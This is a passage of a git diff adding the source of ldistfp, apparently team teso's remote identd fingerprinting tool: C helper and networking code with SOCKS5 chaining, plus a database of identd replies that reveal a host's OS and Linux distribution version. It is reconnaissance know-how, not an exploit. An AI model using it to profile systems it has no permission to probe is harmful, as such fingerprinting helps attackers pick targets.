261 sprintf (dest, "%03d.%03d.%03d.%03d",
262 ipp[0], ipp[1], ipp[2], ipp[3]);
263 break;
264 case (2):
265 sprintf (dest, "%3d.%3d.%3d.%3d",
266 ipp[0], ipp[1], ipp[2], ipp[3]);
267 break;
268 default:
269 break;
270 }
271
272 return (dest);
273}
274
275
276void *
277xrealloc (void *m_ptr, size_t newsize)
278{
279 void *n_ptr;
280
281 n_ptr = realloc (m_ptr, newsize);
282 if (n_ptr == NULL) {
283 fprintf (stderr, "realloc failed\n");
284 exit (EXIT_FAILURE);
285 }
286
287 return (n_ptr);
288}
289
290
291char *
292xstrdup (char *str)
293{
294 char *b;
295
296 b = strdup (str);
297 if (b == NULL) {
298 fprintf (stderr, "strdup failed\n");
299 exit (EXIT_FAILURE);
300 }
301
302 return (b);
303}
304
305
306void *
307xcalloc (int factor, size_t size)
308{
309 void *bla;
310
311 bla = calloc (factor, size);
312
313 if (bla == NULL) {
314 fprintf (stderr, "no memory left\n");
315 exit (EXIT_FAILURE);
316 }
317
318 return (bla);
319}
320
321/* source by dk
322 */
323
324char *
325allocncat (char **to, char *from, size_t len)
326{
327 int rlen = strlen (from);
328 int null = (*to == NULL);
329
330 len = rlen < len ? rlen : len;
331 *to = xrealloc (*to, (null ? 0 : strlen (*to)) + len + 1);
332 if (null)
333 **to = '\0';
334
335 return (strncat (*to, from, len));
336}
337
338
339char *
340alloccat (char **to, char *from)
341{
342 return (allocncat (to, from, strlen (from)));
343}
344
345
346char *
347file_load (char *pathname)
348{
349 FILE * fp;
350 char * new;
351
352 if (pathname == NULL)
353 return (NULL);
354
355 fp = fopen (pathname, "r");
356 if (fp == NULL)
357 return (NULL);
358
359 new = NULL;
360 while (feof (fp) == 0) {
361 unsigned long int rpos;
362
363 rpos = (new == NULL) ? 0 : strlen (new);
364 new = xrealloc (new, rpos + 1024);
365 memset (new + rpos, '\x00', 1024);
366 fread (new + rpos, sizeof (char), 1023, fp);
367 }
368 fclose (fp);
369 new = xrealloc (new, strlen (new) + 1);
370
371 return (new);
372}
373
diff --git a/other/burneye2/tmp/ldistfp/common.h b/other/burneye2/tmp/ldistfp/common.h
new file mode 100644
index 0000000..48e28e4
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/common.h
@@ -0,0 +1,33 @@
1
2#ifndef Z_COMMON_H
3#define Z_COMMON_H
4
5
6#include <sys/types.h>
7#include <sys/time.h>
8#include <netinet/in.h>
9#include <unistd.h>
10
11
12#ifdef DEBUG
13void debugp (char *filename, const char *str, ...);
14void hexdump (char *filename, unsigned char *data, unsigned int amount);
15#endif
16pid_t z_fork (void);
17int m_random (int lowmark, int highmark);
18void set_tv (struct timeval *tv, int seconds);
19void xstrupper (char *str);
20void scnprintf (char *os, size_t len,
21 const char *str, ...);
22unsigned long int tdiff (struct timeval *old, struct timeval *new);
23char * ipv4_print (char *dest, struct in_addr in,
24 int padding);
25void * xrealloc (void *m_ptr, size_t newsize);
26char * xstrdup (char *str);
27void * xcalloc (int factor, size_t size);
28char * allocncat (char **to, char *from, size_t len);
29char * alloccat (char **to, char *from);
30char * file_load (char *pathname);
31
32#endif
33
diff --git a/other/burneye2/tmp/ldistfp/common.o b/other/burneye2/tmp/ldistfp/common.o
new file mode 100644
index 0000000..58edcb2
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/common.o
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/fp.txt b/other/burneye2/tmp/ldistfp/fp.txt
new file mode 100644
index 0000000..faadae6
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/fp.txt
@@ -0,0 +1,122 @@
1# ldistfp ident daemon replies
2# thanks to all submittors
3# some taken from identfp by f0bic (they take a lot from here, too ;)
4#
5
6# non UNIX
7"MacOS" "?" "bug46" "unknown" 0
8
9# BSDs
10"BSDI BSD/OS i386" "4.1" "Compiled: 10:02:25 Jul 30 1999" "pidentd 2.7.4" 1
11"BSDI BSD/OS i386" "4.0" "Compiled: 11:32:57 Jun 11 1998" "pidentd 2.7.4" 1
12"FreeBSD i386" "3.2-rel" "Compiled: 14:05:54 Aug 14 2000" "pidentd 2.7.4" 1
13"FreeBSD i386" "3.4-STABLE" "Compiled: 08:24:36 Sep 8 1999" "pidentd 2.8.5" 1
14"FreeBSD i386" "4.1.1-rel" "UNKNOWN-ERROR" "unknown" 0
15"FreeBSD i386" "4.2-RELEASE" "UNKNOWN-ERROR" "unknown" 0
16"FreeBSD i386" "4.2-STABLE" "Compiled: 11:18:59 Oct 23 2000" "pidentd 2.8.5" 1
17"FreeBSD i386" "4.3-RELEASE" "UNKNOWN-ERROR" "unknown" 0
18"NetBSD i386" "1.5" "Compiled: 02:02:03 Nov 17 2000" "pidentd 2.8.3" 1
19"OpenBSD" "2.7" "UNKNOWN-ERROR" "unknown" 0
20
21# more exotic UNIXs
22"AIX" "4.?" "NKNOWN-ERROR" "unknown" 0
23"Compaq Tru64" "?" "INVALID-PORT" "unknown" 0
24"Digital UNIX" "4.?" "2.5.1" "pidentd 2.5.1" 0
25"Digital UNIX" "4.?" "Compiled: 13:27:11 Sep 17 1997" "pidentd 2.8a4" 1
26"HP-UX" "10.20" "X-VERSION : identd" "unknown" 0
27"HP-UX" "10.20" "B.10.20 identd" "unknown" 1
28"HP-UX" "10.20" "UNKNOWN-ERROR" "unknown" 0
29#"HP-UX" "11.00" "2.7.4" "pidentd 2.7.4" 0
30"IRIX" "64 6.5" "Sep 15 1999 11:21:21" "pidentd 3.0.7" 1
31"OpenVMS" "?" "INVALID-PORT" "unknown" 0
32"Solaris sparc" "8" "UNKNOWN-ERROR" "unknown" 0
33"SunOS" "5.5.1" "Compiled: 14:15:17 Apr 16 1997" "pidentd 2.7.4" 1
34"SunOS" "5.6" "Compiled: 13:50:05 Mar 21 1997" "pidentd 2.7.4" 1
35"SunOS" "5.6" "Compiled: 13:07:48 Jan 16 1998" "pidentd 2.8.1" 1
36"SunOS" "5.6" "Compiled: 16:48:30 May 10 1998" "pidentd 2.8.2" 1
37"SunOS" "5.6" "Dec 18 2000 02:16:29" "pidentd 3.0.12" 1
38"SunOS" "5.7" "UNKNOWN-ERROR" "unknown" 0
39"SunOS" "5.7" "Compiled: 09:45:25 Jun 5 1998" "pidentd 2.8.2" 1
40"SunOS" "5.8" "UNKNOWN-ERROR" "unknown" 0
41"UNIX SVR4 sparc" "?" "Compiled: 22:00:50 Apr 29 1996" "pidentd 2.7a3" 1
42"UNIX SVR4 sparc" "?" "Compiled: 15:48:17 May 22 1998" "pidentd 2.8.2" 1
43
44# Linuxs/uxs/sux/
45"Accel Linux" "6.1" "Jan 9 2000 02:26:14" "3.0.7" 1
46
47"Caldera Desktop" "4.2a" "INVALID-PORT" 0
48"Caldera OpenLinux Workstation" "3.1 Beta: Sybil" "Mar 10 2001 06:21:43" "pidentd 3.0.12" 1
49
50"Debian i386" "1.3" "Compiled: 00:57:59 Mar 4 1997" "2.6.1" 1
51"Debian i386" "1.3.1" "Compiled: 01:25:17 Aug 13 1997" "2.6.1" 1
52"Debian i386" "2.0" "Compiled: 17:21:18 Jul 2 1998" "pidentd 2.6.1" 1
53"Debian i386" "2.0" "Compiled: 14:58:27 Oct 5 1998" "pidentd 2.6.1" 1
54"Debian i386" "2.1" "Compiled: 17:47:13 Feb 13 1999" "pidentd 2.6.1" 1
55"Debian i386" "2.2 official" "Apr 12 2000 16:23:18" "pidentd 3.0.7" 1
56"Debian i386" "2.2" "Nov 6 1999 10:23:17" "pidentd 3.0.7" 1
57"Debian i386" "2.2" "May 5 2000 21:58:50" "pidentd 3.0.10" 1
58"Debian i386" "2.2" "Aug 12 2000 16:50:42" "pidentd 3.0.11" 1
59"Debian i386" "2.2" "Dec 22 2000 17:00:25" "pidentd 3.0.12" 1
60"Debian i386" "woody unstab" "Mar 18 2000 19:41:58" "pidentd 3.0.7" 1
61
62"DLD" "5.41 Pro" "2.5.1" "pidentd 2.5.1" 0
63
64"Halloween" "4" "Nov 7 1999 00:18:10" "pidentd 3.0.7" 1
65
66"Mandrake" "6.0" "Compiled: 15:17:50 May 5 1999" "pidentd 2.8.5" 1
67"Mandrake" "6.1" "Compiled: 08:00:53 Jul 12 1999" "pidentd 2.8.5" 1
68"Mandrake" "7.0" "Compiled: 17:15:39 Nov 1 1999" "pidentd 2.8.5" 1
69"Mandrake" "7.1" "INVALID-PORT" "?" 0
70
71"RedHat i386" "4.0" "Compiled: 19:26:06 Sep 14 1997" "pidentd 2.7.4" 1
72"RedHat i386" "4.2" "2.5.1" "pidentd 2.5.1" 0
73"RedHat i386" "5.2" "UNKNOWN-ERROR" "unknown" 0
74"RedHat i386" "6.0 Publish" "Compiled: 22:18:25 Jan 27 1999" "pidentd 2.8.3" 1
75"RedHat i386" "6.0" "Compiled: 22:13:48 Mar 21 1999" "pidentd 2.8.5" 1
76"RedHat i386" "6.0" "Compiled: 22:13:49 Mar 21 1999" "pidentd 2.8.5" 1
77"RedHat sparc" "6.0" "Compiled: 22:13:47 Mar 21 1999" "pidentd 2.8.5" 1
78"RedHat i386" "6.1" "Sep 13 1999 20:16:57" "pidentd 3.0.7" 1
79"RedHat i386" "6.1.92" "Jan 31 2000 17:29:45" "pidentd 3.0.10" 1
80"RedHat i386" "6.2" "Feb 22 2000 16:14:21" "pidentd 3.0.10" 1
81"RedHat i386" "7.0" "Jul 20 2000 15:09:20" "pidentd 3.0.10" 1
82"RedHat i386" "7.1" "Mar 5 2001 00:27:55" "pidentd 3.0.12" 1
83
84"SlackWare" "3.4" "UNKNOWN-ERROR" "unknown" 0
85"SlackWare" "4" "Compiled: 20:08:40 May 9 1999" "pidentd 2.8.3" 1
86"SlackWare" "4" "INVALID-PORT" "unknown" 0
87"SlackWare" "7" "Compiled: 00:36:16 Oct 22 1999" "pidentd 2.8.3" 1
88"SlackWare" "7" "UNKNOWN-ERROR" "unknown" 0
89"SlackWare" "7.1" "-1073743300, 5: ERROR: INVALID PORT" "oidentd 1.6.4" 0
90
91"Stampede" "?" "INVALID-PORT" "unknown" 0
92
93"SuSE i386" "5.1" "Compiled: 08:18:26 Nov 16 1997" "pidentd 2.7.4" 1
94"SuSE i386" "5.2" "Compiled: 17:14:08 Mar 4 1998" "pidentd 2.7.4" 1
95"SuSE i386" "5.3" "Compiled: 05:40:05 Jul 30 1998" "pidentd 2.7.4" 1
96"SuSE i386" "5.3" "Compiled: 06:11:54 Aug 22 1998" "pidentd 2.7.4" 1
97"SuSE i386" "6.0" "Compiled: 13:20:35 Dec 14 1998" "pidentd 2.7.4" 1
98"SuSE i386" "6.0" "Compiled: 05:14:25 Jan 20 1999" "pidentd 2.7.4" 1
99"SuSE i386" "6.0" "Compiled: 22:11:55 Jan 25 1999" "pidentd 2.7.4" 1
100"SuSE i386" "6.1" "Compiled: 21:12:25 Apr 4 1999" "pidentd 2.7.4" 1
101"SuSE i386" "6.1" "Compiled: 06:22:26 Apr 15 1999" "pidentd 2.7.4" 1
102"SuSE i386" "6.1" "Compiled: 08:58:00 May 3 1999" "pidentd 2.7.4" 1
103"SuSE i386" "6.2 EVAL" "Compiled: 13:22:44 Jul 23 1999" "pidentd 2.7.4" 1
104"SuSE i386" "6.2" "Compiled: 22:38:10 Jul 26 1999" "pidentd 2.7.4" 1
105"SuSE i386" "6.2" "Compiled: 07:59:07 Aug 7 1999" "pidentd 2.7.4" 1
106"SuSE i386" "6.2" "Compiled: 17:09:12 Aug 22 1999" "pidentd 2.7.4" 1
107"SuSE i386" "6.3" "Nov 8 1999 20:30:25" "pidentd 3.0.7" 1
108"SuSE i386" "6.3" "Nov 13 1999 11:08:08" "pidentd 3.0.7" 1
109"SuSE i386" "6.3" "Dec 7 1999 18:52:55" "pidentd 3.0.7" 1
110"SuSE i386" "6.4" "Mar 24 2000 22:28:31" "pidentd 3.1a14" 1
111"SuSE i386" "6.4" "Mar 11 2000 10:25:44" "pidentd 3.1a14" 1
112"SuSE i386" "7.0" "Nov 19 1999 18:27:32" "pidentd 3.0.7" 1
113"SuSE i386" "7.0" "Oct 4 2000 11:18:27" "pidentd 3.1a14" 1
114"SuSE i386" "7.1" "Jan 22 2001 15:06:31" "pidentd 3.1a17" 1
115
116"TurboLinux" "4.0" "Compiled: 12:03:00 Jun 18 1999" "2.8.5" 1
117"TurboLinux" "4.2" "Compiled: 00:07:07 Aug 24 1999" "2.8.5" 1
118
119# junk
120"?" "?" "INVALID-PORT" "jidentd" 0
121"?" "?" "INVALID-PORT" "ident2" 0
122"?" "?" "INVALID-PORT" "midentd 1.x" 0
diff --git a/other/burneye2/tmp/ldistfp/ldistfp-dietlibc b/other/burneye2/tmp/ldistfp/ldistfp-dietlibc
new file mode 100644
index 0000000..cb6de36
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp-dietlibc
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/ldistfp-final-dietlibc.o b/other/burneye2/tmp/ldistfp/ldistfp-final-dietlibc.o
new file mode 100644
index 0000000..1bdaf20
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/ldistfp-final-glibc.o b/other/burneye2/tmp/ldistfp/ldistfp-final-glibc.o
new file mode 100644
index 0000000..49a87ad
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp-final-glibc.o
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/ldistfp-glibc b/other/burneye2/tmp/ldistfp/ldistfp-glibc
new file mode 100644
index 0000000..3fb042c
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp-glibc
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/ldistfp.c b/other/burneye2/tmp/ldistfp/ldistfp.c
new file mode 100644
index 0000000..c1f1068
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp.c
@@ -0,0 +1,368 @@
1/* ldistfp - linux distribution fingerprinting
2 *
3 * by scut / teso
4 */
5
6#include <stdio.h>
7#include <stdlib.h>
8#include <string.h>
9#include "common.h"
10#include "network.h"
11
12#define AUTHORS "-sc/teso"
13#define VERSION "0.1.4"
14
15#define FP_URL "http://www.team-teso.net/data/ldistfp-auth-fingerprints"
16#define SUBMIT_URL "http://www.team-teso.net/ldistfp.php"
17
18typedef struct fingerprint {
19 char * distname;
20 char * distversion;
21 char * substring;
22 char * auth_version;
23 int exact;
24} fingerprint;
25
26fingerprint ** fp_list = NULL;
27char * fp_filename = "ldistfp-auth-fingerprints";
28char * fp_url = FP_URL;
29int fp_count = 0;
30
31int strictsure = 0;
32int machineoutput = 0;
33FILE * newfile = NULL; /* file to save new fingerprints to */
34
35
36void usage (char *prog);
37void host_print (char *host, char *bogus, fingerprint *fp);
38void fp_det (char *host, char *buf);
39void fp_list_read (char *filename);
40void fp_update (char *fname, char *url);
41
42
43void
44usage (char *prog)
45{
46 fprintf (stderr, "usage: %s [-rsmu] [-n <file>] [-U <url>] <host|ip>\n\n", prog);
47 fprintf (stderr, " -r rawmode, read from stdin in format [^ ] (buf$)\n");
48 fprintf (stderr, " -n <file> output new fingerprint information to this file\n");
49 fprintf (stderr, " -s only print host information if properly identified\n");
50 fprintf (stderr, " -m machine output\n");
51 fprintf (stderr, "\nupdate options\n");
52 fprintf (stderr, " -u update from " FP_URL "\n");
53 fprintf (stderr, " -U <url> update from given URL (http://<host>[:<port>]/<file>)\n\n");
54
55 exit (EXIT_FAILURE);
56}
57
58int
59main (int argc, char *argv[])
60{
61 int sock,
62 n;
63 int rawmode = 0;
64 int update_only = 0;
65 char c;
66 char * rbuf;
67 char * target;
68
69
70 fprintf (stderr, "ldistfp "VERSION" - remote identd fingerprinting tool. "AUTHORS"\n\n");
71
72 if (argc < 2)
73 usage (argv[0]);
74
75 while ((c = getopt (argc, argv, "rn:smf:uU:")) != EOF) {
76 switch (c) {
77 case 'r':
78 rawmode = 1;
79 break;
80 case 'n':
81 newfile = fopen (optarg, "a");
82 if (newfile == NULL) {
83 perror ("fopen");
84 exit (EXIT_FAILURE);
85 }
86 break;
87 case 's':
88 strictsure = 1;
89 break;
90 case 'm':
91 machineoutput = 1;
92 break;
93 case 'f':
94 fp_filename = optarg;
95 break;
96 case 'u':
97 update_only = 1;
98 break;
99 case 'U':
100 update_only = 1;
101 fp_url = optarg;
102 break;
103 default:
104 usage ("ldistfp");
105 break;
106 }
107 }
108
109 if (update_only == 1) {
110 fp_update (fp_filename, fp_url);
111 exit (EXIT_SUCCESS);
112 }
113
114 target = argv[argc - 1];
115 if (target[0] == '-')
116 usage ("ldistfp");
117
118 fp_list_read (fp_filename);
119 fprintf (stderr, "read %d fingerprints\n", fp_count);
120
121 if (rawmode) {
122 unsigned char tgt[200];
123 unsigned char ibuf[1024];
124
125 while (fgets (ibuf, sizeof (ibuf), stdin) != NULL) {
126 memset (tgt, '\0', sizeof (tgt));
127 sscanf (ibuf, "%199[^ :]", tgt);
128 tgt[sizeof (tgt) - 1] = '\0';
129 fp_det (tgt, ibuf);
130 }
131 } else {
132
133 sock = net_connect (NULL, target, 113, NULL, 0, 30);
134 if (sock == -1) {
135 perror ("net_connect");
136 exit (EXIT_FAILURE);
137 }
138
139 net_write (sock, "VERSION\n");
140 n = net_rlineta (sock, &rbuf, 15);
141 if (n < 0 && strictsure == 0) {
142 printf ("%s: failed to determine remote version\n", argv[1]);
143 } else {
144 fp_det (target, rbuf);
145 }
146
147 fprintf (stderr, "\n");
148 close (sock);
149 }
150
151 if (newfile != NULL)
152 fclose (newfile);
153
154
155 exit (EXIT_SUCCESS);
156}
157
158
159void
160fp_det (char *host, char *buf)
161{
162 int i;
163
164
165 for (i = 0 ; fp_list[i] != NULL ; ++i) {
166 if (strstr (buf, fp_list[i]->substring) != NULL) {
167
168 /* if it is an exact hit, then we print it and return,
169 * since there cannot be any other hit
170 */
171 if (fp_list[i]->exact != 0) {
172 host_print (host, "", fp_list[i]);
173 return;
174 } else if (strictsure == 0) {
175 host_print (host, "possible ", fp_list[i]);
176 }
177 }
178 }
179
180 if (machineoutput == 0 && newfile == NULL) {
181 printf ("\nunknown, if you know it write down the following line and submit it\n"
182 "at " SUBMIT_URL ", thanks.\n\n%s\n", buf);
183 return;
184 }
185
186 if (newfile == NULL)
187 return;
188
189 /* write new fingerprint to newfile */
190 fprintf (newfile, "%s: %s", host, buf);
191
192 return;
193}
194
195
196void
197host_print (char *host, char *bogus, fingerprint *fp)
198{
199 if (machineoutput == 1) {
200 printf ("%s/%s/%s/%s/%s\n",
201 host,
202 bogus,
203 fp->distname,
204 fp->distversion,
205 fp->auth_version);
206 } else {
207 printf ("%s: %s%s %s running %s\n",
208 host,
209 bogus,
210 fp->distname,
211 fp->distversion,
212 fp->auth_version);
213 }
214
215 return;
216}
217
218void
219fp_list_read (char *filename)
220{
221 int n,
222 fpc = 1;
223 FILE * fpl;
224 unsigned char * fpl_fg;
225
226 fpl = fopen (filename, "r");
227 if (fpl == NULL) {
228 perror ("finger print file");
229 exit (EXIT_FAILURE);
230 }
231
232 do {
233 fingerprint * new = xcalloc (1, sizeof (fingerprint));
234
235 fpc += 1;
236 fp_list = xrealloc (fp_list, fpc * sizeof (fingerprint *));
237 fp_list[fpc - 1] = NULL;
238 fp_list[fpc - 2] = new;
239
240 new->distname = xcalloc (1, 128);
241 new->distversion = xcalloc (1, 128);
242 new->substring = xcalloc (1, 128);
243 new->auth_version = xcalloc (1, 128);
244
245 /* format: "substring" "dist name" "dist version" "identd version" 0|1
246 */
247 do {
248 unsigned char buf[256];
249
250 n = 1;
251 fpl_fg = fgets (buf, sizeof (buf), fpl);
252 if (fpl_fg != NULL && strlen (buf) > 1 && buf[0] != '#') {
253 n = sscanf (buf, "\"%127[^\"]\"%*[\t ]\"%127[^\"]\"%*[\t ]"
254 "\"%127[^\"]\"%*[\t ]\"%127[^\"]\"%*[\t ]%d\n",
255 new->distname, new->distversion, new->substring,
256 new->auth_version, &new->exact);
257 }
258 } while (n != 5 && fpl_fg != NULL);
259
260 if (fpl_fg == NULL) {
261 free (new->distname);
262 free (new->distversion);
263 free (new->substring);
264 free (new->auth_version);
265 free (new);
266 fp_list[fpc - 2] = NULL;
267 } else {
268 fp_count++;
269 }
270 } while (fpl_fg != NULL);
271
272 fclose (fpl);
273}
274
275
276/* mini http/1.0 client, assume non-chunked transfer oh my.
277 * who invented chunking anyway ?
278 */
279void
280fp_update (char *fname, char *url)
281{
282 int fp_dataflag = 2;
283 int fp_updated_size = 0;
284 FILE * fp_updated;
285 char line_buf[2048];
286
287 int cs;
288 char host[128];
289 char hostfile[128];
290 unsigned short int port;
291
292
293 /* first open file, else we may not need to get the file if we can't
294 * open the file at all
295 */
296 fp_updated = fopen (fname, "w");
297 if (fp_updated == NULL) {
298 perror ("fp_update:fopen");
299 exit (EXIT_FAILURE);
300 }
301
302 memset (host, '\0', sizeof (host));
303 memset (hostfile, '\0', sizeof (hostfile));
304
305 if (sscanf (url, "http://%127[^/]%127s", host, hostfile) != 2) {
306 fprintf (stderr, "invalid URL: %s\n", url);
307 exit (EXIT_FAILURE);
308 }
309 host[sizeof (host) - 1] = '\0';
310 hostfile[sizeof (hostfile) - 1] = '\0';
311
312
313 /* find possible port suffix */
314 if (sscanf (host, "%*[^:]:%hu", &port) != 1)
315 port = 80;
316 if (strchr (host, ':') != NULL)
317 *(strchr (host, ':')) = '\0';
318
319 printf ("fetching:\n");
320 printf ("%s [%hu]: %s\n", host, port, hostfile);
321 cs = net_connect (NULL, host, port, NULL, 0, 15);
322 if (cs <= 0) {
323 perror ("fp_update:net_connect");
324 exit (EXIT_FAILURE);
325 }
326 printf ("GET [%s]\n", hostfile);
327
328 /* send request with special User-Agent (to track ldistfp versions
329 * that are used (and for possible ldistfp fingerprint file format
330 * updates, so that new format could be send for new clients, and
331 * old for old ones :-)
332 */
333 net_write (cs, "GET %s HTTP/1.1\n", hostfile);
334 net_write (cs, "User-Agent: ldistfp/"VERSION"\n");
335 net_write (cs, "Host: %s\n", host);
336 net_write (cs, "Connection: close\n");
337 net_write (cs, "\n");
338
339 do {
340 int n;
341
342 memset (line_buf, '\0', sizeof (line_buf));
343 n = net_rlinet (cs, line_buf, sizeof (line_buf), 15);
344 if (n <= 0)
345 break;
346
347 line_buf[sizeof (line_buf) - 1] = '\0';
348
349 if (fp_dataflag != 0) {
350 while (strlen (line_buf) > 0 &&
351 (line_buf[strlen (line_buf) - 1] == '\r' ||
352 line_buf[strlen (line_buf) - 1] == '\n'))
353 line_buf[strlen (line_buf) - 1] = '\0';
354 }
355
356 if (fp_dataflag == 2 && strstr (line_buf, " 200 OK") != NULL)
357 fp_dataflag = 1;
358 else if (fp_dataflag == 1 && strcmp (line_buf, "") == 0)
359 fp_dataflag = 0;
360 else if (fp_dataflag == 0 && n > 0) {
361 fp_updated_size += n;
362 fprintf (fp_updated, "%s", line_buf);
363 }
364 } while (1);
365
366 fclose (fp_updated);
367}
368
diff --git a/other/burneye2/tmp/ldistfp/ldistfp.o b/other/burneye2/tmp/ldistfp/ldistfp.o
new file mode 100644
index 0000000..6d9c9fb
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/ldistfp.o
Binary files differ
diff --git a/other/burneye2/tmp/ldistfp/network.c b/other/burneye2/tmp/ldistfp/network.c
new file mode 100644
index 0000000..56f954a
--- /dev/null
+++ b/other/burneye2/tmp/ldistfp/network.c
@@ -0,0 +1,712 @@
1
2/* scut's leet network library ;)
3 * 1999 (c) scut
4 *
5 * networking routines
6 * based on my hbot networking sources,
7 * revised, extended and adapted 990405
8 * extended, improved and fixed 990430
9 *
10 * nearly all of this code wouldn't have been possible without w. richard stevens
11 * excellent network coding book. if you are interested in network coding,
12 * there is no way around it.
13 */
14
15#include <sys/types.h>
16#include <sys/ioctl.h>
17#include <sys/socket.h>
18#include <sys/time.h>
19#include <netinet/in.h>
20#include <arpa/inet.h>
21#include <netdb.h>
22#include <net/if.h>
23#include <errno.h>
24#include <fcntl.h>
25#include <stdarg.h>
26#include <stdio.h>
27#include <stdlib.h>
28#include <string.h>
29#include <unistd.h>
30#include "network.h"
31
32int net_readtimeout = NET_READTIMEOUT;
33int net_conntimeout = NET_CONNTIMEOUT;
34int net_identtimeout = NET_IDENTTIMEOUT;
35
36
37int
38net_socks_connect (char *socks, unsigned short int sport, char *server, unsigned short int port, int sec)
39{
40 int s5s;
41 struct sockaddr_in cs;
42
43 s5s = net_connect (&cs, socks, sport, NULL, 0, sec);
44 if (s5s == -1)
45 return (-1);
46
47 if (net_socks_put_s5info (s5s, server, port, sec) == -1) {
48 close (s5s);
49 return (-1);
50 }
51 return (s5s);
52}
53
54
55int
56net_socks_put_s5info (int s5s, char *server, unsigned short int port, int sec)
57{
58 int n;
59 char buff[1024];
60
61 /* v5 + noauth */
62 net_write (s5s, "\x05\x01%c", 0);
63 if (net_rtimeout (s5s, sec) == -1)
64 return (-1);
65 recv (s5s, buff, sizeof (buff), 0);
66
67 /* chain us =) */
68 net_write (s5s, "\x05\x01%c\x03%c%s%c%c", 0, strlen (server), server, (port >> 8) & 0xff, port & 0xff);
69 if (net_rtimeout (s5s, sec) == -1)
70 return (-1);
71 n = recv (s5s, buff, sizeof (buff), 0);
72 if (buff[1] != 0x00) {
73 return (-1);
74 }
75 return (1);
76}
77
78
79int
80net_parseip (char *inp, char **ip, unsigned short int *port)
81{
82 int n;
83
84 if (inp == NULL)
85 return (0);
86 if (strchr (inp, ':') == NULL)
87 return (0);
88
89 *ip = calloc (1, 256);
90 if (*ip == NULL)
91 return (0);
92
93 n = sscanf (inp, "%[^:]:%hu", *ip, port);
94 if (n != 2)
95 return (0);
96
97 *ip = realloc (*ip, strlen (*ip) + 1);
98 if (*ip == NULL || (*port < 1 || *port > 65535))
99 return (0);
100
101 return (1);
102}
103
104
105char *
106net_getlocalip (void)
107{
108 struct sockaddr_in pf;
109 char name[255];
110
111 memset (name, '\0', sizeof (name));
112
113 if (gethostname (name, sizeof (name) - 1) == -1) {
114 return (NULL);
115 }
116
117 pf.sin_addr.s_addr = net_resolve (name);
118
119 return (strdup (inet_ntoa (pf.sin_addr)));;
120}
121
122
123char *
124net_peeraddress (int socket)
125{
126 char * hip;
127 struct sockaddr_in peeraddr;
128 size_t size = sizeof (struct sockaddr_in);
129
130 if (getpeername (socket, (struct sockaddr *) &peeraddr, &size) == -1)
131 return (NULL);
132
133 net_printipa (&peeraddr.sin_addr, &hip);
134
135 return (hip);
136}
137
138
139FILE *
140net_descriptify (int socket)
141{
142 FILE *fp;
143
144 fp = fdopen (socket, "r+");
145 return ((fp == NULL) ? (NULL) : (fp));
146}
147
148
149/* loosely based on rfc931.c */
150
151int
152net_ident (char **ident, struct sockaddr_in *locals, unsigned short int localport,
153 struct sockaddr_in *remotes, unsigned short int remoteport)
154{
155 int is; /* ident socket */
156 struct sockaddr_in isa;
157 int n;
158 char identreply[512], *cp;
159 unsigned int rmt_port, our_port;
160
161
162 *ident = NULL;
163
164 is = net_connect (&isa, inet_ntoa (remotes->sin_addr), 113, NULL, 0, net_identtimeout);
165 if (is == -1)
166 return (-1);
167
168 /* ident request */
169 net_write (is, "%u,%u\r\n", remoteport, localport);
170 memset (identreply, '\0', sizeof (identreply));
171
172 n = net_rlinet (is, identreply, sizeof(identreply) -1, net_identtimeout);
173 if (n == -1) {
174 close (is);
175 return (-1);
176 }
177 close (is);
178
179 *ident = calloc (1, 256);
180#ifdef DEBUG
181 printf("%s\n", identreply);
182#endif
183 n = sscanf (identreply, "%u , %u : USERID :%*[^:]:%255s", &rmt_port, &our_port, *ident);
184 if (n != 3) {
185 free (*ident);
186 *ident = NULL;
187 return (-1);
188 }
189
190 /* check the ports 'man */
191 if ((rmt_port != remoteport) || (our_port != localport)) {
192 free (*ident);
193 *ident = NULL;
194 return (-1);
195 }
196
197 /* strip character and save some memory */
198 if ((cp = strchr (*ident, '\r')))
199 *cp = '\0';
200 n = strlen (*ident);
201 *ident = realloc (*ident, n + 1);
202 (*ident)[n] = '\0';
203
204#ifdef DEBUG
205 printf("ident-return: %s\n", *ident);
206#endif
207 return (1);
208}
209
210
211int
212net_accept (int s, struct sockaddr_in *cs, int maxsec)
213{
214 int flags, n;
215 fd_set ac_s;
216 int len;
217 struct timeval tval;
218
219 flags = fcntl(s, F_GETFL, 0);
220 if (flags == -1)
221 return (-1);
222 n = fcntl(s, F_SETFL, flags | O_NONBLOCK);
223 if (n == -1)
224 return (-1);
225
226 FD_ZERO(&ac_s);
227 FD_SET(s, &ac_s);
228 tval.tv_sec = maxsec;
229 tval.tv_usec = 0;
230
231 n = select(s + 1, &ac_s, NULL, NULL, maxsec ? &tval : NULL);
232 if (n == 0)
233 return (0);
234
235 if (FD_ISSET(s, &ac_s)) {
236 len = sizeof(struct sockaddr_in);
237 n = accept(s, (struct sockaddr *) cs, &len);
238 if (n == -1) {
239 switch (errno) {
240 case EWOULDBLOCK:
241 case ECONNABORTED:
242 case EINTR: if (fcntl(s, F_SETFL, flags) == -1)
243 return (-1);
244 return (0);
245 default: return (-1);
246 }
247 }
248 if (fcntl(s, F_SETFL, flags) == -1)
249 return (-1);
250 return (n);
251 }
252 if (fcntl(s, F_SETFL, flags) == -1)
253 return (-1);
254 return (0);
255}
256
257
258void
259net_boundfree (bound *bf)
260{
261 close (bf->bs);
262 free (bf);
263 return;
264}
265
266
267bound *
268net_bind (char *ip, unsigned short int port)
269{
270 bound *b;
271 int br, gsnr, lr;
272 int len, reusetmp;
273 struct sockaddr_in *sap;
274
275 if (port >= 65536)
276 return (NULL);
277
278 b = calloc(1, sizeof (bound));
279 if (b == NULL)
280 return (NULL);
281 b->bs = socket (AF_INET, SOCK_STREAM, 0);
282 if (b->bs == -1)
283 goto berror;
284
285 reusetmp = 1;
